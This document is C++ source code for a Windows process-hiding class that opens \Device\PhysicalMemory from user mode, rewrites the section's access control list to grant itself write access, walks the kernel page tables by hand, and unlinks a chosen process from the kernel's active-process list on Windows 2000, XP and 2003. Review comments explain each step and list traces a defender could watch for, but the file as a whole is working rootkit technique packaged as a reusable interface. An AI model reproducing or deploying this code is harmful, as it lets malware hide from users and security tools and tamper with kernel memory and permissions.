vc 隐藏进程
#ifndef HIDEPROCESS_H
#define HIDEPROCESS_H

// CHideProcess: removes a process from the kernel's active-process list by
// rewriting two EPROCESS list pointers through the \Device\PhysicalMemory
// section (direct kernel object manipulation performed from user mode).
// The implementation is tied to 32-bit Windows 5.x (2000/XP/2003): it relies
// on hard-coded page-directory physical addresses and EPROCESS offsets per
// minor version (see HideProcess.cpp).
//
// All members are static. The single private static instance m_NoAction
// exists only so that its constructor/destructor load and unload ntdll.dll.
class CHideProcess
{
public:
    // Interface: hide the calling process (GetCurrentProcessId()).
    static BOOL HideCurrent();
    // Interface: hide the process whose process id is dwID.
    // Returns TRUE on success; FALSE when ntdll was not loaded, the EPROCESS
    // could not be located, or \Device\PhysicalMemory could not be opened.
    static BOOL HideByID(DWORD dwID);
    // Destructor: releases ntdll.dll via CloseNTDLL().
    virtual ~CHideProcess();
protected:
    // Loads ntdll.dll and resolves RtlInitUnicodeString, ZwOpenSection and
    // ZwQuerySystemInformation; sets m_bInit when all three are found.
    static BOOL InitNTDLL();
    // Worker behind HideCurrent/HideByID: unlinks the EPROCESS of dwID.
    static BOOL YHideProcess(DWORD dwID);
    // Frees ntdll.dll and clears m_bInit.
    static VOID CloseNTDLL();
    // Adds a SECTION_MAP_WRITE ACE for the trustee name "CURRENT_USER" to
    // the DACL of hSection.
    static VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
    // Opens \Device\PhysicalMemory (g_hMPM) and maps the page-directory page
    // of the detected OS version into g_pMapPhysicalMemory.
    // Returns the section handle, or NULL on an unsupported version/failure.
    static HANDLE OpenPhysicalMemory();
    // Walks a 32-bit two-level page directory at BaseAddress to translate the
    // virtual address addr into a physical address; returns 0 when the
    // directory or table entry is not present.
    static PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
    // Read / write one ULONG at kernel virtual address addr by mapping the
    // containing 4 KB physical page from the section.
    static ULONG GetData(PVOID addr);
    static BOOL SetData(PVOID addr,ULONG data);
    // Finds the EPROCESS address of PID from the SystemHandleInformation
    // listing (the Object field of a handle opened on PID); 0 on failure.
    static DWORD GetEprocessFromPid (ULONG PID);
    // long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);
protected:
    // TRUE once InitNTDLL has resolved all three ntdll exports.
    static BOOL m_bInit;
    // Static instance whose ctor/dtor drive InitNTDLL/CloseNTDLL.
    static CHideProcess m_NoAction;
private:
    // Constructor is private: the class is used through its static interface.
    CHideProcess();
};

#endif
// HideProcess.cpp: implementation of the CHideProcess class.
// Process-hiding program: call HideProcess (HideCurrent / HideByID) to hide.
//
// Review notes (what the code below visibly does):
//  * The target's EPROCESS is located by opening a handle to it and reading
//    the Object pointer of that handle back from SystemHandleInformation
//    (GetEprocessFromPid).
//  * \Device\PhysicalMemory is opened for read/write; if that is denied the
//    section's DACL is rewritten to grant SECTION_MAP_WRITE and the open is
//    retried (OpenPhysicalMemory / SetPhyscialMemorySectionCanBeWrited).
//  * Kernel virtual addresses are translated by walking the page directory
//    by hand (LinearToPhys), using a per-OS-version hard-coded physical
//    address for the kernel page directory, and single ULONGs are then read
//    or written through 4 KB views of the section (GetData / SetData).
//  * The two list pointers at a hard-coded EPROCESS offset are rewritten so
//    the active-process list skips the target (YHideProcess).
//  Everything assumes 32-bit pointers (ULONG casts) and Windows major
//  version 5 (2000/XP/2003). From a defender's viewpoint the observable
//  behaviours are: LoadLibrary of ntdll with GetProcAddress of ZwOpenSection /
//  ZwQuerySystemInformation, opening \Device\PhysicalMemory with write
//  access, changing its DACL, and querying SystemHandleInformation.
//  NOTE(review): later Windows releases no longer grant user-mode access to
//  \Device\PhysicalMemory, so this approach is bound to the versions checked
//  in OpenPhysicalMemory — confirm against the target platform.
//////////////////////////////////////////////////////////////////////
#include "stdafx.h"
#include <windows.h>
#include <Accctrl.h>
#include <Aclapi.h>
#include "HideProcess.h"

// NT status helpers; NTSTATUS is declared below as a plain LONG.
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

// Native API structures redeclared here because the file only includes the
// Win32 SDK headers, not the DDK.
typedef struct _IO_STATUS_BLOCK {
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// OBJECT_ATTRIBUTES.Attributes flags (only 0 is used in this file).
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

//
// SYSTEM_INFORMATION_CLASS — only the one class this file queries.
//
typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

//
// SYSTEM_HANDLE_INFORMATION
// Information Class 16: one entry per handle in the system; the buffer
// returned by ZwQuerySystemInformation starts with a ULONG entry count
// followed by this array (see GetEprocessFromPid).
//
typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    PVOID Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

// Function-pointer types for the three ntdll exports resolved in InitNTDLL.
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );
typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) (
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
    );

// Resolved ntdll entry points (NULL until InitNTDLL succeeds).
RTLINITUNICODESTRING RtlInitUnicodeString = NULL;
ZWOPENSECTION ZwOpenSection = NULL;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;
// Module handle for ntdll.dll, owned by InitNTDLL/CloseNTDLL.
HMODULE g_hNtDLL = NULL;
// View of the kernel page-directory page, set by OpenPhysicalMemory and
// released at the end of YHideProcess.
PVOID g_pMapPhysicalMemory = NULL;
// Handle to the \Device\PhysicalMemory section, same lifetime as above.
HANDLE g_hMPM = NULL;
// OS version filled in by OpenPhysicalMemory; its dwMinorVersion selects the
// EPROCESS offsets in YHideProcess.
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
BOOL CHideProcess::m_bInit = FALSE;
// Static instance: its constructor runs at program start-up and loads ntdll.
CHideProcess CHideProcess::m_NoAction;
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////
// Loads ntdll and records whether all required exports were found.
CHideProcess::CHideProcess()
{
    m_bInit = InitNTDLL();
}
// Releases ntdll.
CHideProcess::~CHideProcess()
{
    CloseNTDLL();
}
// load dll and get functions
// Returns FALSE if ntdll.dll cannot be loaded or any of the three exports is
// missing; in that case m_bInit is left as is (the constructor overwrites it
// with the return value anyway).
BOOL CHideProcess::InitNTDLL()
{
    // load dll
    if (NULL == g_hNtDLL)
    {
        g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
        if (NULL == g_hNtDLL)
        {
            return FALSE;
        }
    }
    // get functions
    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
    ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );
    if ((RtlInitUnicodeString == NULL) || (ZwOpenSection == NULL) || (ZwQuerySystemInformation == NULL))
    {
        return FALSE;
    }
    m_bInit = TRUE;
    return TRUE;
}
//---------------------------------------------------------------------------
// Frees ntdll.dll if it was loaded and marks the class uninitialised.
VOID CHideProcess::CloseNTDLL()
{
    if (NULL != g_hNtDLL)
    {
        FreeLibrary(g_hNtDLL);
        g_hNtDLL = NULL;
        m_bInit = FALSE;
    }
}
//---------------------------------------------------------------------------
// Rewrites the DACL of hSection so that the trustee named "CURRENT_USER" is
// granted SECTION_MAP_WRITE, on top of the existing DACL.
// Note (visible in the code): none of the three error branches returns, so
// after a failed GetSecurityInfo / SetEntriesInAcl the function still goes
// on to the next call with whatever pDacl / pNewDacl hold; on the success
// path the pSD and pNewDacl buffers are never LocalFree'd.
VOID CHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    PACL pNewDacl = NULL;
    // Read the current DACL (pDacl points into pSD).
    DWORD dwRes = GetSecurityInfo( hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD );
    if(ERROR_SUCCESS != dwRes)
    {
        if(pSD) LocalFree(pSD);
        if(pNewDacl) LocalFree(pNewDacl);
    }
    // One additional ACE: GRANT SECTION_MAP_WRITE to "CURRENT_USER".
    EXPLICIT_ACCESS ea;
    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance= NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = _T("CURRENT_USER");
    // Merge the new ACE with the existing DACL into pNewDacl.
    dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
    if(ERROR_SUCCESS != dwRes)
    {
        if(pSD) LocalFree(pSD);
        if(pNewDacl) LocalFree(pNewDacl);
    }
    // Apply the merged DACL to the section object.
    dwRes = SetSecurityInfo( hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL );
    if(ERROR_SUCCESS != dwRes)
    {
        if(pSD) LocalFree(pSD);
        if(pNewDacl) LocalFree(pNewDacl);
    }
}
//---------------------------------------------------------------------------
// Opens \Device\PhysicalMemory into g_hMPM and maps the 4 KB page at the
// hard-coded physical address of the kernel page directory for this OS
// version into g_pMapPhysicalMemory (used as BaseAddress by LinearToPhys).
// Returns g_hMPM, or NULL when the major version is not 5, the minor version
// is not 0/1/2, the section cannot be opened, or the view cannot be mapped.
// Side effect: fills g_osvi, which YHideProcess later reads.
HANDLE CHideProcess::OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;
    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx (&g_osvi);
    // Only the Windows 5.x family is handled.
    if (5 != g_osvi.dwMajorVersion)
        return NULL;
    // Physical address of the kernel page directory, per minor version.
    switch(g_osvi.dwMinorVersion)
    {
    case 0: PhyDirectory = 0x30000; break; // 2k
    case 1: PhyDirectory = 0x39000; break; // xp
    case 2: PhyDirectory = 0x39000; break; // 2k03
    default:
        AfxMessageBox(_T("init PhysicalMemory: Unknown version..."));
        TRACE(_T("init PhysicalMemory: Unknown version...\n"));
        return NULL;
    }
    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &physmemString;
    attributes.Attributes = 0;
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;
    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
    if(status == STATUS_ACCESS_DENIED)
    {
        // Access denied: reopen with WRITE_DAC only, grant ourselves
        // SECTION_MAP_WRITE on the section, then retry the read/write open.
        // The result of the WRITE_DAC open is not checked before use.
        status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
    }
    if(!NT_SUCCESS(status))
    {
        AfxMessageBox(_T("Open section: \\Device\\PhysicalMemory failed..."));
        TRACE(_T("Open section: \\Device\\PhysicalMemory failed...\n"));
        return NULL;
    }
    TRACE(_T("OpenPhysicalMemory() OffSet: %p\n"), PhyDirectory);
    // Map one page of physical memory at the page-directory address.
    g_pMapPhysicalMemory = MapViewOfFile( // ZwMapViewOfSection
        g_hMPM, // handle
        FILE_MAP_READ|FILE_MAP_WRITE,
        0, // offset high part
        PhyDirectory, // offset low part
        0x1000 // size
        );
    if( g_pMapPhysicalMemory == NULL )
    {
        AfxMessageBox(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
        TRACE(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
        return NULL;
    }
    return g_hMPM;
}
//---------------------------------------------------------------------------
// Software page walk for 32-bit, two-level (non-PAE) paging:
//   BaseAddress  - view of the page directory (g_pMapPhysicalMemory)
//   addr         - virtual address to translate
// Returns the physical address, or 0 when the directory entry or the table
// entry has its present bit (bit 0) clear.
PVOID CHideProcess::LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr;
    // Top 10 bits index the page directory.
    ULONG PGDE = BaseAddress[VAddr>>22];
    ULONG PTE;
    ULONG PAddr;
    if (0 == (PGDE & 1))
        return 0;
    // Bit 7 of the directory entry set: 4 MB page, no page table to walk.
    ULONG tmp = PGDE & 0x00000080;
    if (0 != tmp)
    {
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        // Map the page table (physical address in the upper 20 bits of the
        // directory entry) and index it with the middle 10 bits of VAddr.
        // The MapViewOfFile result is dereferenced without a NULL check;
        // 4 is the FILE_MAP_READ access value.
        TRACE(_T("GetData() OffSet: %p\n"), PGDE & 0xfffff000);
        PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
        PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
        if (0 == (PTE&1))
            return 0;
        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
    }
    return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
// Reads the ULONG at kernel virtual address addr: translates it to a
// physical address, maps the containing 4 KB page and indexes into it.
// Returns 0 if the view cannot be mapped (indistinguishable from a stored 0).
ULONG CHideProcess::GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    TRACE(_T("GetData() g_pMapPhysicalMemory: %p, addr: %p, phys: %p\n"), g_pMapPhysicalMemory, addr, phys);
    TRACE(_T("GetData() OffSet: %p\n"), phys & 0xfffff000);
    PULONG tmp = (PULONG)MapViewOfFile(
        g_hMPM,
        FILE_MAP_READ|FILE_MAP_WRITE,
        0,
        phys & 0xfffff000, // offset low part
        0x1000 // size
        );
    if (0 == tmp)
        return 0;
    // ULONG index within the page = byte offset / 4.
    ULONG ret = tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);
    return ret;
}
//---------------------------------------------------------------------------
// Writes data to the ULONG at kernel virtual address addr through a 4 KB
// write view of the physical page. Returns FALSE only if the view could not
// be mapped. A LinearToPhys result of 0 is not rejected here.
BOOL CHideProcess::SetData(PVOID addr,ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    TRACE(_T("SetData() OffSet: %p\n"), phys & 0xfffff000);
    PULONG tmp = (PULONG)MapViewOfFile(
        g_hMPM,
        FILE_MAP_WRITE,
        0,
        phys & 0xfffff000,
        0x1000
        );
    if (0 == tmp)
        return FALSE;
    tmp[(phys & 0xFFF)>>2] = data;
    UnmapViewOfFile(tmp);
    return TRUE;
}
//---------------------------------------------------------------------------
// Disabled unhandled-exception filter (kept for reference, not compiled).
/*
long __stdcall CHideProcess::exeception(struct _EXCEPTION_POINTERS *tmp)
{
    ExitProcess(0);
    return 1 ;
}
//*/
//---------------------------------------------------------------------------
// Returns the kernel address of the EPROCESS for PID, or 0 on failure.
// Method: open a handle to PID from the current process, enumerate all
// handles via SystemHandleInformation, and return the Object pointer of the
// entry whose (ProcessId, Handle) matches (our pid, hProc). The handle is
// closed and the buffer freed on every exit path.
DWORD CHideProcess::GetEprocessFromPid (ULONG PID)
{
    NTSTATUS status;
    PVOID buf = NULL;
    ULONG size = 1;
    ULONG NumOfHandle = 0;
    ULONG i;
    PSYSTEM_HANDLE_INFORMATION h_info = NULL;
    // Handle-table entries are matched on the *current* process id, because
    // the handle opened below belongs to this process, not to PID.
    DWORD dwCurrentID = GetCurrentProcessId();
    // TRACE(_T("GetCurrentProcessId = %d\n"), dwCurrentID);
    // LocateNtdllEntry( );
    // Open a handle to the target so it shows up in the handle list;
    // (original note: PROCESS objects have ObjectTypeNumber 5)
    HANDLE hProc = OpenProcess( // PROCESS_ALL_ACCESS,
        PROCESS_QUERY_INFORMATION,
        FALSE,
        PID // GetCurrentProcessId() //
        );
    if (NULL == hProc)
    {
        TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
        TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
        return 0;
    }
    // Query with a doubling buffer until ZwQuerySystemInformation stops
    // reporting STATUS_INFO_LENGTH_MISMATCH.
    for ( size = 1024; ; size *= 2 )
    {
        if ( NULL == ( buf = calloc( size, 1 ) ) )
        {
            TRACE( _T("calloc( %u, 1 ) failed\n"), size );
            TRACE(_T("calloc( %u, 1 ) failed\n"), size );
            if ( buf != NULL )
            {
                free( buf );
                buf = NULL;
            }
            CloseHandle(hProc);
            return 0;
        }
        status = ZwQuerySystemInformation( SystemHandleInformation, buf, size, NULL );
        if ( !NT_SUCCESS( status ) )
        {
            if ( STATUS_INFO_LENGTH_MISMATCH == status )
            {
                free( buf );
                buf = NULL;
                continue;
            }
            else
            {
                TRACE( "ZwQuerySystemInformation() failed\n");
                TRACE( "ZwQuerySystemInformation() failed\n");
                if ( buf != NULL )
                {
                    free( buf );
                    buf = NULL;
                }
                CloseHandle(hProc);
                return 0;
            }
        }
        else
        {
            break;
        }
    } /* end of for */
    // The buffer begins with a ULONG holding the number of array entries,
    // followed directly by the SYSTEM_HANDLE_INFORMATION array.
    NumOfHandle = *((PULONG)buf);
    h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf + 4);
    for(i = 0; i < NumOfHandle; i++)
    {
        if(h_info->ProcessId == dwCurrentID)//&&( h_info.Handle==0x3d8 ) )
        {
            // TRACE(_T("ProcessId: %d, Handle: %p, OBJECT: %p, ObjectTypeNumber: %d\n\r"),
            // PID, h_info.Handle, h_info.Object, h_info.ObjectTypeNumber);
            if (h_info->Handle == (DWORD)hProc) // (h_info.ObjectTypeNumber == 5)
            {
                // TRACE(_T("****ProcessId: %d, Handle:%p, OBJECT %p\n\r"),
                // PID, hProc, h_info.Object);
                // Object is the kernel EPROCESS address behind hProc.
                DWORD dwRet = (DWORD)(h_info->Object);
                if (buf != NULL)
                {
                    free( buf );
                    buf = NULL;
                }
                CloseHandle(hProc);
                return dwRet;
            }
        }
    }
    if ( buf != NULL )
    {
        free( buf );
        buf = NULL;
    }
    CloseHandle(hProc);
    return 0;
}
// Main hide-process function.
// Steps: check ntdll was loaded; locate the EPROCESS of dwID; open and map
// \Device\PhysicalMemory; read the two list pointers at the version-specific
// EPROCESS offset; write each neighbour's pointer past this block; release
// the view and section handle. Returns FALSE on any of the three early
// failures, TRUE otherwise (the SetData results are not checked).
BOOL CHideProcess::YHideProcess(DWORD dwID)
{
    //
    if (!m_bInit)
    {
        AfxMessageBox(_T("load NTDLL failed..."));
        TRACE(_T("load NTDLL failed...\n"));
        return FALSE;
    }
    // Obtain the pointer to the process's EPROCESS block.
    ULONG process = (ULONG)GetEprocessFromPid(dwID);
    if (process == 0)
    {
        // TRACE(_T("GetEprocessFromPid() failed...\n"));
        return FALSE;
    }
    TRACE(_T("GetEprocessFromPid() process = %p...\n"), process);
    // Open the physical-memory section and map it (also fills g_osvi).
    if (NULL == OpenPhysicalMemory())
    {
        AfxMessageBox(_T("OpenPhysicalMemory() failed..."));
        TRACE(_T("OpenPhysicalMemory() failed...\n"));
        return FALSE;
    }
    //
    // The two ifs below select, by Windows minor version, the offset of the
    // FLINK/BLINK pointer pair inside the EPROCESS block. Because
    // OpenPhysicalMemory only succeeds for minor versions 0, 1 and 2, one of
    // the two branches is always taken here.
    ULONG fw, bw;
    if (0 == g_osvi.dwMinorVersion)
    {
        // minor version 0 = Windows 2000 (the original comment also named
        // Vista, but major version 6 is rejected in OpenPhysicalMemory).
        fw = GetData(PVOID(process + 0xa0));
        bw = GetData(PVOID(process + 0xa4));
    }
    else if ((1 == g_osvi.dwMinorVersion) || (2 == g_osvi.dwMinorVersion))
    {
        // in WinXP: in Win2003
        fw = GetData(PVOID(process + 0x88));
        bw = GetData(PVOID(process + 0x8c));
    }
    // ****
    TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);
    TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);
    // The two SetData calls rewrite the active-process list so that it skips
    // this process's EPROCESS block: the successor's back pointer (fw + 4)
    // receives bw, and the predecessor's forward pointer (bw) receives fw.
    SetData(PVOID(fw + 4), bw);
    SetData(PVOID(bw), fw);
    // Done: release the page-directory view and the section handle.
    UnmapViewOfFile(g_pMapPhysicalMemory);
    g_pMapPhysicalMemory = NULL;
    CloseHandle(g_hMPM);
    g_hMPM = NULL;
    return TRUE;
}
// Hide-process interface: hides the calling process.
BOOL CHideProcess::HideCurrent()
{
    TRACE(_T("Hide Current Process ID = %d \n"), GetCurrentProcessId());
    return YHideProcess(GetCurrentProcessId());
}
// Hide-process interface: hides the process with id dwID.
BOOL CHideProcess::HideByID(DWORD dwID)
{
    TRACE(_T("Hide Process ID = %d \n"), dwID);
    return YHideProcess(dwID);
}